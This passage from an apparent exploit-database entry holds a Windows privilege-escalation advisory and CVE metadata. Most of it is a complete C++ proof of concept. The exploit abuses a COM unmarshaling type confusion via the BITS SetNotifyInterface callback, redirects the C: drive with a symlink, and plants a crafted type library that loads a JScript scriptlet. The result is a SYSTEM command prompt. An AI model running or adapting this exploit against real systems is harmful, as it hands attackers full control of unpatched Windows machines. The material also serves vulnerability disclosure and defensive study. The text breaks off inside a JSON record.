through the Aggregate Standard Marshaler. \r\n \r\nThe bug lies in the implementation of unpacking the results of the the RQI2 request in CStdMarshal::Finish_RemQIAndUnmarshal2. For each MInterfacePointer CStdMarshal::UnmarshalInterface is called passing the IID of the expected interface and the binary data wrapped in an IStream. CStdMarshal::UnmarshalInterface blindly unmarshals the interface, which creates a local proxy object but the proxy is created for the IID in the OBJREF stream and NOT the IID requested in RQI2. No further verification occurs at this point and the created proxy is passed back up the call stack until the received by the caller (through a void** obviously). \r\n \r\nIf the IID in the OBJREF doesn\u2019t match the IID requested the caller doesn\u2019t know, if it calls any methods on the expected interface it will be calling a type confused object. This could result in crashes in the caller when it tries to access methods on the expected interface which aren\u2019t there or are implemented differently. You could probably also return a standard OBJREF to a object local to the caller, this will result in returning the local object itself which might have more scope for exploiting the type confusion. In order to get the caller to use RQI2 we just need to pass it back an object which is custom marshaled with the Aggregate Standard Marshaler. This will set a flag on the marshaler which indicates to always use the aggregate marshaler which results in using RQI2 instead of RQI. As this class is a core component of COM it\u2019s trusted and so isn\u2019t affected by the EOAC_NO_CUSTOM_MARSHAL setting.\r\n \r\nIn order to exploit this a different caller needs to call QueryInterface on an object under a less trusted user's control. This could be a more privileged user (such as a sandbox broker), or a privileged service. This is pretty easy pattern to find, any method in an exposed interface on a more trusted COM object which takes an interface pointer or variant would potentially be vulnerable. For example IPersistStream takes an IStream interface pointer and will call methods on it. Another type of method is one of the various notification interfaces such as IBackgroundCopyCallback for BITS. This can probably also be used remotely if the attacker has the opportunity to inject an OBJREF stream into a connection which is set to CONNECT level security (which seems to be the default activation security). \r\n \r\nOn to exploitation, as you well know I\u2019ve little interest in exploiting memory corruptions, especially as this would either this will trigger CFG on modern systems or would require a very precise lineup of expected method and actual called method which could be tricky to exploit reliably. However I think at least using this to escape a sandbox it might be your only option. So I\u2019m not going to do that, instead I\u2019m going to exploit it logically, the only problem is this is probably unexploitable from a sandbox (maybe) and requires a very specific type of callback into our object. \r\n \r\nThe thing I\u2019m going to exploit is in the handling of OLE Automation auto-proxy creation from type libraries. When you implement an Automation compatible object you could implement an explicit proxy but if you\u2019ve already got a Type library built from your IDL then OLEAUT32 provides an alternative. If you register your interface with a Proxy CLSID for PSOAInterface or PSDispatch then instead of loading your PS DLL it will load OLEAUT32. The proxy loader code will lookup the interface entry for the passed IID to see if there\u2019s a registered type library associated with it. If there is the code will call LoadTypeLib on that library and look up the interface entry in the type library. It will then construct a custom proxy object based on the type library information. \r\n \r\nThe trick here is while in general we don\u2019t control the location of the type library (so it\u2019s probably in a location we can write to such as system32) if we can get an object unmarshaled which indicates it\u2019s IID is one of these auto-proxy interfaces while the privileged service is impersonating us we can redirect the C: drive to anywhere we like and so get the service to load an arbitrary type library file instead of a the system one. One easy place where this exact scenario occurs is in the aforementioned BITS SetNotifyInterface function. The service first impersonates the caller before calling QI on the notify interface. We can then return an OBJREF for a automation IID even though the service asked for a BITS callback interface.\r\n \r\nSo what? Well it\u2019s been known for almost 10 years that the Type library file format is completely unsafe. It was reported and it wasn\u2019t changed, Tombkeeper highlighted this in his \u201cSexrets [sic] of LoadLibrary\u201d presentation at CSW 2015. You can craft a TLB which will directly control EIP. Now you\u2019d assume therefore I\u2019m trading a unreliable way of getting EIP control for one which is much easier, if you assume that you\u2019d be wrong. Instead I\u2019m going to abuse the fact that TLBs can have referenced type libraries, which is used instead of embedding the type definitions inside the TLB itself. When a reference type is loaded the loader will try and look up the TLB by its GUID, if that fails it will take the filename string and pass it verbatim to LoadTypeLib. It\u2019s a lesser know fact that this function, if it fails to find a file with the correct name will try and parse the name as a moniker. Therefore we can insert a scriptlet moniker into the type library, when the auto-proxy generator tries to find how many functions the interface implements it walks the inheritance chain, which causes the referenced TLB to be loaded, which causes a scriptlet moniker to be loaded and bound which results in arbitrary execution in a scripting language inside the privileged COM caller. \r\n \r\nThe need to replace the C: drive is why this won\u2019t work as a sandbox escape. Also it's a more general technique, not specific to this vulnerability as such, you could exploit it in the low-level NDR marshaler layer, however it\u2019s rare to find something impersonating the caller during the low-level unmarshal. Type libraries are not loaded using the flag added after CVE-2015-1644 which prevent DLLs being loaded from the impersonate device map. I think you might want to fix this as well as there\u2019s other places and scenarios this can occur, for example there\u2019s a number of WMI services (such as anything which touches GPOs) which result in the ActiveDS com object being created, this is automation compatible and so will load a type library while impersonating the caller. Perhaps the auto-proxy generated should temporarily disable impersonation when loading the type library to prevent this happening. \r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C++ source code file. You need to compile it first. It abuses the BITS SetNotifyInterface to get a type library loaded under impersonation. We cause it to load a type library which references a scriptlet moniker which gets us code execution inside the BITS service.\r\n \r\n1) Compile the C++ source code file.\r\n2) Execute the PoC from a directory writable by the current user. \r\n3) An admin command running as local system should appear on the current desktop.\r\n \r\nExpected Result:\r\nThe caller should realize there\u2019s an IID mismatch and refuse to unmarshal, or at least QI the local proxy for the correct interface.\r\n \r\nObserved Result:\r\nThe wrong proxy is created to that requested resulting in type confusion and an automation proxy being created resulting in code execution in the BITS server.\r\n*/\r\n \r\n// BITSTest.cpp : Defines the entry point for the console application.\r\n//\r\n#include <bits.h>\r\n#include <bits4_0.h>\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <lm.h>\r\n#include <string>\r\n#include <comdef.h>\r\n#include <winternl.h>\r\n#include <Shlwapi.h>\r\n#include <strsafe.h>\r\n#include <vector>\r\n \r\n#pragma comment(lib, \"shlwapi.lib\")\r\n \r\nstatic bstr_t IIDToBSTR(REFIID riid)\r\n{\r\n LPOLESTR str;\r\n bstr_t ret = \"Unknown\";\r\n if (SUCCEEDED(StringFromIID(riid, &str)))\r\n {\r\n ret = str;\r\n CoTaskMemFree(str);\r\n }\r\n return ret;\r\n}\r\n \r\nGUID CLSID_AggStdMarshal2 = { 0x00000027,0x0000,0x0008,{ 0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 } };\r\nGUID IID_ITMediaControl = { 0xc445dde8,0x5199,0x4bc7,{ 0x98,0x07,0x5f,0xfb,0x92,0xe4,0x2e,0x09 } };\r\n \r\nclass CMarshaller : public IMarshal\r\n{\r\n LONG _ref_count;\r\n IUnknownPtr _unk;\r\n \r\n ~CMarshaller() {}\r\n \r\npublic:\r\n \r\n CMarshaller(IUnknown* unk) : _ref_count(1)\r\n {\r\n _unk = unk;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE QueryInterface(\r\n /* [in] */ REFIID riid,\r\n /* [iid_is][out] */ _COM_Outptr_ void __RPC_FAR *__RPC_FAR *ppvObject)\r\n {\r\n *ppvObject = nullptr;\r\n printf(\"QI - Marshaller: %ls %p\\n\", IIDToBSTR(riid).GetBSTR(), this);\r\n \r\n if (riid == IID_IUnknown)\r\n {\r\n *ppvObject = this;\r\n }\r\n else if (riid == IID_IMarshal)\r\n {\r\n *ppvObject = static_cast<IMarshal*>(this);\r\n }\r\n else\r\n {\r\n return E_NOINTERFACE;\r\n }\r\n printf(\"Queried Success: %p\\n\", *ppvObject);\r\n ((IUnknown*)*ppvObject)->AddRef();\r\n return S_OK;\r\n }\r\n \r\n virtual ULONG STDMETHODCALLTYPE AddRef(void)\r\n {\r\n printf(\"AddRef: %d\\n\", _ref_count);\r\n return InterlockedIncrement(&_ref_count);\r\n }\r\n \r\n virtual ULONG STDMETHODCALLTYPE Release(void)\r\n {\r\n printf(\"Release: %d\\n\", _ref_count);\r\n ULONG ret = InterlockedDecrement(&_ref_count);\r\n if (ret == 0)\r\n {\r\n printf(\"Release object %p\\n\", this);\r\n delete this;\r\n }\r\n return ret;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags,\r\n /* [annotation][out] */\r\n _Out_ CLSID *pCid)\r\n {\r\n *pCid = CLSID_AggStdMarshal2;\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags,\r\n /* [annotation][out] */\r\n _Out_ DWORD *pSize)\r\n {\r\n *pSize = 1024;\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE MarshalInterface(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm,\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags)\r\n {\r\n printf(\"Marshal Interface: %ls\\n\", IIDToBSTR(riid).GetBSTR());\r\n IID iid = riid;\r\n if (iid == __uuidof(IBackgroundCopyCallback2) || iid == __uuidof(IBackgroundCopyCallback))\r\n {\r\n printf(\"Setting bad IID\\n\");\r\n iid = IID_ITMediaControl;\r\n }\r\n HRESULT hr = CoMarshalInterface(pStm, iid, _unk, dwDestContext, pvDestContext, mshlflags);\r\n printf(\"Marshal Complete: %08X\\n\", hr);\r\n return hr;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm,\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][out] */\r\n _Outptr_ void **ppv)\r\n {\r\n return E_NOTIMPL;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm)\r\n {\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE DisconnectObject(\r\n /* [annotation][in] */\r\n _In_ DWORD dwReserved)\r\n {\r\n return S_OK;\r\n }\r\n};\r\n \r\nclass FakeObject : public IBackgroundCopyCallback2, public IPersist\r\n{\r\n LONG m_lRefCount;\r\n \r\n ~FakeObject() {};\r\n \r\npublic:\r\n //Constructor, Destructor\r\n FakeObject() {\r\n m_lRefCount = 1;\r\n }\r\n \r\n //IUnknown\r\n HRESULT __stdcall QueryInterface(REFIID riid, LPVOID *ppvObj)\r\n {\r\n if (riid == __uuidof(IUnknown))\r\n {\r\n printf(\"Query for IUnknown\\n\");\r\n *ppvObj = this;\r\n }\r\n else if (riid == __uuidof(IBackgroundCopyCallback2))\r\n {\r\n printf(\"Query for IBackgroundCopyCallback2\\n\");\r\n *ppvObj = static_cast<IBackgroundCopyCallback2*>(this);\r\n }\r\n else if (riid == __uuidof(IBackgroundCopyCallback))\r\n {\r\n printf(\"Query for IBackgroundCopyCallback\\n\");\r\n *ppvObj = static_cast<IBackgroundCopyCallback*>(this);\r\n }\r\n else if (riid == __uuidof(IPersist))\r\n {\r\n printf(\"Query for IPersist\\n\");\r\n *ppvObj = static_cast<IPersist*>(this);\r\n }\r\n else if (riid == IID_ITMediaControl)\r\n {\r\n printf(\"Query for ITMediaControl\\n\");\r\n *ppvObj = static_cast<IPersist*>(this);\r\n }\r\n else\r\n {\r\n printf(\"Unknown IID: %ls %p\\n\", IIDToBSTR(riid).GetBSTR(), this);\r\n *ppvObj = NULL;\r\n return E_NOINTERFACE;\r\n }\r\n \r\n ((IUnknown*)*ppvObj)->AddRef();\r\n return NOERROR;\r\n }\r\n \r\n ULONG __stdcall AddRef()\r\n {\r\n return InterlockedIncrement(&m_lRefCount);\r\n }\r\n \r\n ULONG __stdcall Release()\r\n {\r\n ULONG ulCount = InterlockedDecrement(&m_lRefCount);\r\n \r\n if (0 == ulCount)\r\n {\r\n delete this;\r\n }\r\n \r\n return ulCount;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobTransferred(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob)\r\n {\r\n printf(\"JobTransferred\\n\");\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobError(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ __RPC__in_opt IBackgroundCopyError *pError)\r\n {\r\n printf(\"JobError\\n\");\r\n return S_OK;\r\n }\r\n \r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobModification(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ DWORD dwReserved)\r\n {\r\n printf(\"JobModification\\n\");\r\n return S_OK;\r\n }\r\n \r\n \r\n virtual HRESULT STDMETHODCALLTYPE FileTransferred(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ __RPC__in_opt IBackgroundCopyFile *pFile)\r\n {\r\n printf(\"FileTransferred\\n\");\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetClassID(\r\n /* [out] */ __RPC__out CLSID *pClassID)\r\n {\r\n *pClassID = GUID_NULL;\r\n return S_OK;\r\n }\r\n};\r\n \r\n_COM_SMARTPTR_TYPEDEF(IBackgroundCopyJob, __uuidof(IBackgroundCopyJob));\r\n_COM_SMARTPTR_TYPEDEF(IBackgroundCopyManager, __uuidof(IBackgroundCopyManager));\r\n \r\nstatic HRESULT Check(HRESULT hr)\r\n{\r\n if (FAILED(hr))\r\n {\r\n throw _com_error(hr);\r\n }\r\n return hr;\r\n}\r\n \r\n#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)\r\n \r\ntypedef NTSTATUS(NTAPI* fNtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);\r\ntypedef VOID(NTAPI *fRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);\r\n \r\nFARPROC GetProcAddressNT(LPCSTR lpName)\r\n{\r\n return GetProcAddress(GetModuleHandleW(L\"ntdll\"), lpName);\r\n}\r\n \r\n \r\nclass ScopedHandle\r\n{\r\n HANDLE _h;\r\npublic:\r\n ScopedHandle() : _h(nullptr)\r\n {\r\n }\r\n \r\n ScopedHandle(ScopedHandle&) = delete;\r\n \r\n ScopedHandle(ScopedHandle&& h) {\r\n _h = h._h;\r\n h._h = nullptr;\r\n }\r\n \r\n ~ScopedHandle()\r\n {\r\n if (!invalid())\r\n {\r\n CloseHandle(_h);\r\n _h = nullptr;\r\n }\r\n }\r\n \r\n bool invalid() {\r\n return (_h == nullptr) || (_h == INVALID_HANDLE_VALUE);\r\n }\r\n \r\n void set(HANDLE h)\r\n {\r\n _h = h;\r\n }\r\n \r\n HANDLE get()\r\n {\r\n return _h;\r\n }\r\n \r\n HANDLE* ptr()\r\n {\r\n return &_h;\r\n }\r\n \r\n \r\n};\r\n \r\nScopedHandle CreateSymlink(LPCWSTR linkname, LPCWSTR targetname)\r\n{\r\n fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT(\"RtlInitUnicodeString\");\r\n fNtCreateSymbolicLinkObject pfNtCreateSymbolicLinkObject = (fNtCreateSymbolicLinkObject)GetProcAddressNT(\"NtCreateSymbolicLinkObject\");\r\n \r\n OBJECT_ATTRIBUTES objAttr;\r\n UNICODE_STRING name;\r\n UNICODE_STRING target;\r\n \r\n pfRtlInitUnicodeString(&name, linkname);\r\n pfRtlInitUnicodeString(&target, targetname);\r\n \r\n InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);\r\n \r\n ScopedHandle hLink;\r\n \r\n NTSTATUS status = pfNtCreateSymbolicLinkObject(hLink.ptr(), SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);\r\n if (status == 0)\r\n {\r\n printf(\"Opened Link %ls -> %ls: %p\\n\", linkname, targetname, hLink.get());\r\n return hLink;\r\n }\r\n else\r\n {\r\n printf(\"Error creating link %ls: %08X\\n\", linkname, status);\r\n return ScopedHandle();\r\n }\r\n}\r\n \r\n \r\nbstr_t GetSystemDrive()\r\n{\r\n WCHAR windows_dir[MAX_PATH] = { 0 };\r\n \r\n GetWindowsDirectory(windows_dir, MAX_PATH);\r\n \r\n windows_dir[2] = 0;\r\n \r\n return windows_dir;\r\n}\r\n \r\nbstr_t GetDeviceFromPath(LPCWSTR lpPath)\r\n{\r\n WCHAR drive[3] = { 0 };\r\n drive[0] = lpPath[0];\r\n drive[1] = lpPath[1];\r\n drive[2] = 0;\r\n \r\n WCHAR device_name[MAX_PATH] = { 0 };\r\n \r\n if (QueryDosDevice(drive, device_name, MAX_PATH))\r\n {\r\n return device_name;\r\n }\r\n else\r\n {\r\n printf(\"Error getting device for %ls\\n\", lpPath);\r\n exit(1);\r\n }\r\n}\r\n \r\nbstr_t GetSystemDevice()\r\n{\r\n return GetDeviceFromPath(GetSystemDrive());\r\n}\r\n \r\nbstr_t GetExe()\r\n{\r\n WCHAR curr_path[MAX_PATH] = { 0 };\r\n GetModuleFileName(nullptr, curr_path, MAX_PATH);\r\n return curr_path;\r\n}\r\n \r\nbstr_t GetExeDir()\r\n{\r\n WCHAR curr_path[MAX_PATH] = { 0 };\r\n GetModuleFileName(nullptr, curr_path, MAX_PATH);\r\n PathRemoveFileSpec(curr_path);\r\n \r\n return curr_path;\r\n}\r\n \r\nbstr_t GetCurrentPath()\r\n{\r\n bstr_t curr_path = GetExeDir();\r\n \r\n bstr_t ret = GetDeviceFromPath(curr_path);\r\n \r\n ret += &curr_path.GetBSTR()[2];\r\n \r\n return ret;\r\n}\r\n \r\nvoid TestBits()\r\n{\r\n IBackgroundCopyManagerPtr pQueueMgr;\r\n \r\n Check(CoCreateInstance(__uuidof(BackgroundCopyManager), NULL,\r\n CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pQueueMgr)));\r\n \r\n IUnknownPtr pOuter = new CMarshaller(static_cast<IPersist*>(new FakeObject()));\r\n IUnknownPtr pInner;\r\n \r\n Check(CoGetStdMarshalEx(pOuter, SMEXF_SERVER, &pInner));\r\n \r\n IBackgroundCopyJobPtr pJob;\r\n GUID guidJob;\r\n Check(pQueueMgr->CreateJob(L\"BitsAuthSample\",\r\n BG_JOB_TYPE_DOWNLOAD,\r\n &guidJob,\r\n &pJob));\r\n \r\n IUnknownPtr pNotify;\r\n pNotify.Attach(new CMarshaller(pInner));\r\n {\r\n ScopedHandle link = CreateSymlink(L\"\\\\??\\\\C:\", GetCurrentPath());\r\n printf(\"Result: %08X\\n\", pJob->SetNotifyInterface(pNotify));\r\n }\r\n if (pJob)\r\n {\r\n pJob->Cancel();\r\n }\r\n printf(\"Done\\n\");\r\n}\r\n \r\nclass CoInit\r\n{\r\npublic:\r\n CoInit()\r\n {\r\n Check(CoInitialize(nullptr));\r\n Check(CoInitializeSecurity(nullptr, -1, nullptr, nullptr,\r\n RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_NO_CUSTOM_MARSHAL | EOAC_DYNAMIC_CLOAKING, nullptr));\r\n }\r\n \r\n ~CoInit()\r\n {\r\n CoUninitialize();\r\n }\r\n};\r\n \r\n// {D487789C-32A3-4E22-B46A-C4C4C1C2D3E0}\r\nstatic const GUID IID_BaseInterface =\r\n{ 0xd487789c, 0x32a3, 0x4e22,{ 0xb4, 0x6a, 0xc4, 0xc4, 0xc1, 0xc2, 0xd3, 0xe0 } };\r\n \r\n// {6C6C9F33-AE88-4EC2-BE2D-449A0FFF8C02}\r\nstatic const GUID TypeLib_BaseInterface =\r\n{ 0x6c6c9f33, 0xae88, 0x4ec2,{ 0xbe, 0x2d, 0x44, 0x9a, 0xf, 0xff, 0x8c, 0x2 } };\r\n \r\nGUID TypeLib_Tapi3 = { 0x21d6d480,0xa88b,0x11d0,{ 0x83,0xdd,0x00,0xaa,0x00,0x3c,0xca,0xbd } };\r\n \r\nvoid Create(bstr_t filename, bstr_t if_name, REFGUID typelib_guid, REFGUID iid, ITypeLib* ref_typelib, REFGUID ref_iid)\r\n{\r\n DeleteFile(filename);\r\n ICreateTypeLib2Ptr tlb;\r\n Check(CreateTypeLib2(SYS_WIN32, filename, &tlb));\r\n tlb->SetGuid(typelib_guid);\r\n \r\n ITypeInfoPtr ref_type_info;\r\n Check(ref_typelib->GetTypeInfoOfGuid(ref_iid, &ref_type_info));\r\n \r\n ICreateTypeInfoPtr create_info;\r\n Check(tlb->CreateTypeInfo(if_name, TKIND_INTERFACE, &create_info));\r\n Check(create_info->SetTypeFlags(TYPEFLAG_FDUAL | TYPEFLAG_FOLEAUTOMATION));\r\n HREFTYPE ref_type;\r\n Check(create_info->AddRefTypeInfo(ref_type_info, &ref_type));\r\n Check(create_info->AddImplType(0, ref_type));\r\n Check(create_info->SetGuid(iid));\r\n Check(tlb->SaveAllChanges());\r\n}\r\n \r\nstd::vector<BYTE> ReadFile(bstr_t path)\r\n{\r\n ScopedHandle hFile;\r\n hFile.set(CreateFile(path, GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr));\r\n if (hFile.invalid())\r\n {\r\n throw _com_error(E_FAIL);\r\n } \r\n DWORD size = GetFileSize(hFile.get(), nullptr);\r\n std::vector<BYTE> ret(size);\r\n if (size > 0)\r\n {\r\n DWORD bytes_read;\r\n if (!ReadFile(hFile.get(), ret.data(), size, &bytes_read, nullptr) || bytes_read != size)\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n }\r\n \r\n return ret;\r\n}\r\n \r\nvoid WriteFile(bstr_t path, const std::vector<BYTE> data)\r\n{\r\n ScopedHandle hFile;\r\n hFile.set(CreateFile(path, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, 0, nullptr));\r\n if (hFile.invalid())\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n if (data.size() > 0)\r\n {\r\n DWORD bytes_written;\r\n if (!WriteFile(hFile.get(), data.data(), data.size(), &bytes_written, nullptr) || bytes_written != data.size())\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n }\r\n}\r\n \r\nvoid WriteFile(bstr_t path, const char* data)\r\n{\r\n const BYTE* bytes = reinterpret_cast<const BYTE*>(data);\r\n std::vector<BYTE> data_buf(bytes, bytes + strlen(data));\r\n WriteFile(path, data_buf);\r\n}\r\n \r\nvoid BuildTypeLibs(LPCSTR script_path)\r\n{\r\n ITypeLibPtr stdole2;\r\n Check(LoadTypeLib(L\"stdole2.tlb\", &stdole2));\r\n \r\n printf(\"Building Library with path: %s\\n\", script_path);\r\n unsigned int len = strlen(script_path);\r\n \r\n bstr_t buf = GetExeDir() + L\"\\\\\";\r\n for (unsigned int i = 0; i < len; ++i)\r\n {\r\n buf += L\"A\";\r\n }\r\n \r\n Create(buf, \"IBadger\", TypeLib_BaseInterface, IID_BaseInterface, stdole2, IID_IDispatch);\r\n ITypeLibPtr abc;\r\n Check(LoadTypeLib(buf, &abc));\r\n \r\n \r\n bstr_t built_tlb = GetExeDir() + L\"\\\\output.tlb\";\r\n Create(built_tlb, \"ITMediaControl\", TypeLib_Tapi3, IID_ITMediaControl, abc, IID_BaseInterface);\r\n \r\n std::vector<BYTE> tlb_data = ReadFile(built_tlb);\r\n for (size_t i = 0; i < tlb_data.size() - len; ++i)\r\n {\r\n bool found = true;\r\n for (unsigned int j = 0; j < len; j++)\r\n {\r\n if (tlb_data[i + j] != 'A')\r\n {\r\n found = false;\r\n }\r\n }\r\n \r\n if (found)\r\n {\r\n printf(\"Found TLB name at offset %zu\\n\", i);\r\n memcpy(&tlb_data[i], script_path, len);\r\n break;\r\n }\r\n }\r\n \r\n CreateDirectory(GetExeDir() + L\"\\\\Windows\", nullptr);\r\n CreateDirectory(GetExeDir() + L\"\\\\Windows\\\\System32\", nullptr);\r\n \r\n bstr_t target_tlb = GetExeDir() + L\"\\\\Windows\\\\system32\\\\tapi3.dll\";\r\n WriteFile(target_tlb, tlb_data);\r\n}\r\n \r\nconst wchar_t x[] = L\"ABC\";\r\n \r\nconst wchar_t scriptlet_start[] = L\"<?xml version='1.0'?>\\r\\n<package>\\r\\n<component id='giffile'>\\r\\n\"\r\n\"<registration description='Dummy' progid='giffile' version='1.00' remotable='True'>\\r\\n\"\\\r\n\"</registration>\\r\\n\"\\\r\n\"<script language='JScript'>\\r\\n\"\\\r\n\"<![CDATA[\\r\\n\"\\\r\n\" new ActiveXObject('Wscript.Shell').exec('\";\r\n \r\nconst wchar_t scriptlet_end[] = L\"');\\r\\n\"\\\r\n\"]]>\\r\\n\"\\\r\n\"</script>\\r\\n\"\\\r\n\"</component>\\r\\n\"\\\r\n\"</package>\\r\\n\";\r\n \r\nbstr_t CreateScriptletFile()\r\n{\r\n bstr_t script_file = GetExeDir() + L\"\\\\run.sct\";\r\n bstr_t script_data = scriptlet_start;\r\n bstr_t exe_file = GetExe();\r\n wchar_t* p = exe_file;\r\n while (*p)\r\n {\r\n if (*p == '\\\\')\r\n {\r\n *p = '/';\r\n }\r\n p++;\r\n }\r\n \r\n DWORD session_id;\r\n ProcessIdToSessionId(GetCurrentProcessId(), &session_id);\r\n WCHAR session_str[16];\r\n StringCchPrintf(session_str, _countof(session_str), L\"%d\", session_id);\r\n \r\n script_data += L\"\\\"\" + exe_file + L\"\\\" \" + session_str + scriptlet_end;\r\n \r\n WriteFile(script_file, script_data);\r\n \r\n return script_file;\r\n}\r\n \r\nvoid CreateNewProcess(const wchar_t* session)\r\n{\r\n DWORD session_id = wcstoul(session, nullptr, 0);\r\n ScopedHandle token;\r\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token.ptr()))\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n ScopedHandle new_token;\r\n \r\n if (!DuplicateTokenEx(token.get(), TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, new_token.ptr()))\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n SetTokenInformation(new_token.get(), TokenSessionId, &session_id, sizeof(session_id));\r\n \r\n STARTUPINFO start_info = {};\r\n start_info.cb = sizeof(start_info);\r\n start_info.lpDesktop = L\"WinSta0\\\\Default\";\r\n PROCESS_INFORMATION proc_info;\r\n WCHAR cmdline[] = L\"cmd.exe\";\r\n if (CreateProcessAsUser(new_token.get(), nullptr, cmdline,\r\n nullptr, nullptr, FALSE, CREATE_NEW_CONSOLE, nullptr, nullptr, &start_info, &proc_info))\r\n {\r\n CloseHandle(proc_info.hProcess);\r\n CloseHandle(proc_info.hThread);\r\n }\r\n}\r\n \r\nint wmain(int argc, wchar_t** argv)\r\n{\r\n try\r\n {\r\n CoInit ci;\r\n if (argc > 1)\r\n {\r\n CreateNewProcess(argv[1]);\r\n }\r\n else\r\n {\r\n bstr_t script = L\"script:\" + CreateScriptletFile();\r\n BuildTypeLibs(script);\r\n TestBits();\r\n }\r\n }\r\n catch (const _com_error& err)\r\n {\r\n printf(\"Error: %ls\\n\", err.ErrorMessage());\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-21] #", "sourceHref": "https://0day.today/exploit/27798", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "mscve": [{"lastseen": "2021-12-06T18:25:23", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-11T07:00:00", "id": "MS:CVE-2017-0258", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0258", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists when Windows fails to properly validate input before loading type libraries. An attacker could use this vulnerability to elevate their privilege level.\n\nTo exploit this vulnerability an attacker would first need to have access to the local system and have the ability to execute a malicious application.\n\nThe update corrects how Windows validates permissions when loading type libraries.\n", 